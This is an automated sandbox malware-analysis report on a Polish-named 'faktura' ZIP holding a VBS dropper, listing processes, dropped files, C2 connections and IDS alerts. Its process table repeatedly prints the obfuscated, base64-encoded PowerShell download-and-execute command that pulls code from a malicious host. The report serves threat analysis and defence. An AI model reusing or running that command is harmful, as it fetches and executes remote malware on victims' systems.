File name: __faktura_9875.zip
Full analysis: https://app.any.run/tasks/dc730fc6-c480-4cd8-b6e2-8e9d1c0769d4
Verdict: Malicious activity
Analysis date: January 10, 2019, 14:32:13
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5: CE206F063C8C2121491CC4B6F4C5E8B8
SHA1: 86DEB3E3C8F99B59373E66DB2CE995AD5390BB84
SHA256: 16B35906A78E2683FB2C05CFA54F2FBE6CFD936DBA1354DC6789D67719EADECE
SSDEEP: 12:50aeYO87awZJy4i17a9x6wMiMRSF41OrkhgLY1ZdsKzae7OcgaY:u3FxsJModMACzgLY3ii3Kc8

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes settings of System certificates

      • WScript.exe (PID: 2892)
      • WScript.exe (PID: 2440)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2348)
      • cmd.exe (PID: 3564)
      • cmd.exe (PID: 772)
    • Writes to a start menu file

      • powershell.exe (PID: 3004)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • powershell.exe (PID: 4012)
      • powershell.exe (PID: 1104)
      • powershell.exe (PID: 1440)
    • Creates files in the user directory

      • powershell.exe (PID: 1440)
      • powershell.exe (PID: 4012)
      • powershell.exe (PID: 1104)
      • powershell.exe (PID: 3856)
      • powershell.exe (PID: 2732)
      • powershell.exe (PID: 3004)
    • Application launched itself

      • powershell.exe (PID: 4012)
      • powershell.exe (PID: 1104)
      • powershell.exe (PID: 1440)
    • Adds / modifies Windows certificates

      • WScript.exe (PID: 2440)
      • WScript.exe (PID: 2892)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 2440)
    • Uses IPCONFIG.EXE to discover IP address

      • powershell.exe (PID: 3004)
      • powershell.exe (PID: 2732)
      • powershell.exe (PID: 3856)
    • Executable content was dropped or overwritten

      • WScript.exe (PID: 2440)
  • INFO

    • Reads settings of System Certificates

      • powershell.exe (PID: 1104)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: __faktura_9875.vbs
ZipUncompressedSize: 651
ZipCompressedSize: 339
ZipCRC: 0xf776349e
ZipModifyDate: 2019:01:10 05:46:29
ZipCompression: Deflated
ZipBitFlag: -
ZipRequiredVersion: 788
No data.
All screenshots are available in the full report
Total processes: 52
Monitored processes: 18
Malicious processes: 4
Suspicious processes: 5

Behavior graph

Process nodes shown in the graph (the interactive graph itself is only in the full report; "no specs" marks nodes the report gives no details for): winrar.exe (no specs), wscript.exe, wscript.exe, cmd.exe (no specs), powershell.exe, cmd.exe (no specs), powershell.exe, cmd.exe (no specs), powershell.exe, powershell.exe, powershell.exe, powershell.exe, and six ipconfig.exe nodes (no specs). Parent/child relationships are given in the process table below.

Process information

PID | CMD | Path | Parent process

2936 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\__faktura_9875.zip" | C:\Program Files\WinRAR\WinRAR.exe | explorer.exe
  User: admin; Company: Alexander Roshal; Integrity Level: MEDIUM; Description: WinRAR archiver; Exit code: 0; Version: 5.60.0

2892 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\__faktura_9875.vbs" | C:\Windows\System32\WScript.exe | explorer.exe
  User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Version: 5.8.7600.16385

2440 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\__faktura_9875.vbs" | C:\Windows\System32\WScript.exe | explorer.exe
  User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Version: 5.8.7600.16385

3564 | "C:\Windows\System32\cmd.exe" /c po^w^ershell -E^nc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA" | C:\Windows\System32\cmd.exe | WScript.exe
  User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

4012 | powershell -Enc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe
  User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255)

2348 | "C:\Windows\System32\cmd.exe" /c po^w^ershell -E^nc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA" | C:\Windows\System32\cmd.exe | WScript.exe
  User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

1104 | powershell -Enc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe
  User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255)

772 | "C:\Windows\System32\cmd.exe" /c po^w^ershell -E^nc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA" | C:\Windows\System32\cmd.exe | WScript.exe
  User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

1440 | powershell -Enc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe
  User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255)

3856 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand [elided] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe
  User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 2 422
Read events: 1 978
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 2
Suspicious files: 12
Text files: 0
Unknown types: 1

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
2936 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa2936.26247\__faktura_9875.vbs | (not listed) | (not listed) | (not listed)
4012 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OLNRTVW02882HJN3F5QC.temp | (not listed) | (not listed) | (not listed)
1104 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GBCGBO981QTRV0O8M8F7.temp | (not listed) | (not listed) | (not listed)
1440 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JH3DTHK80ESDDTRN1Z8I.temp | (not listed) | (not listed) | (not listed)
3856 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N8UTB5F8KMUKI6FJ3JF4.temp | (not listed) | (not listed) | (not listed)
2732 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B08OZ32K3EE2XK7XD6K0.temp | (not listed) | (not listed) | (not listed)
3004 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PR7ICYH6KG83DW4MA3M1.temp | (not listed) | (not listed) | (not listed)
2732 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF264685.TMP | binary | 6073B6FC66D2E68644893344F6904E4A | 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
3004 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 6073B6FC66D2E68644893344F6904E4A | 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
1440 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2640c9.TMP | binary | 6073B6FC66D2E68644893344F6904E4A | 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 0
TCP/UDP connections: 13
DNS requests: 2
Threats: 0

HTTP requests

No HTTP requests

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
2892 | WScript.exe | 185.158.251.30:443 | serviceussupport.info | 23media GmbH | NL | unknown
2440 | WScript.exe | 185.158.251.30:443 | serviceussupport.info | 23media GmbH | NL | unknown
2732 | powershell.exe | 194.32.78.61:80 | infosevicues.info | (not listed) | (not listed) | suspicious
1440 | powershell.exe | 194.32.78.61:443 | infosevicues.info | (not listed) | (not listed) | suspicious
3856 | powershell.exe | 194.32.78.61:80 | infosevicues.info | (not listed) | (not listed) | suspicious
4012 | powershell.exe | 194.32.78.61:443 | infosevicues.info | (not listed) | (not listed) | suspicious
1104 | powershell.exe | 194.32.78.61:443 | infosevicues.info | (not listed) | (not listed) | suspicious
3004 | powershell.exe | 194.32.78.61:80 | infosevicues.info | (not listed) | (not listed) | suspicious

DNS requests

Domain | IP | Reputation
serviceussupport.info | 185.158.251.30 | unknown
infosevicues.info | 194.32.78.61 | malicious

Threats

PID | Process | Class | Message
3004 | powershell.exe | Potentially Bad Traffic | SUSPICIOUS [PTsecurity] SysInfo Exfiltration
3004 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] System Enumeration via PowerShell
28 ETPRO signatures available at the full report
No debug info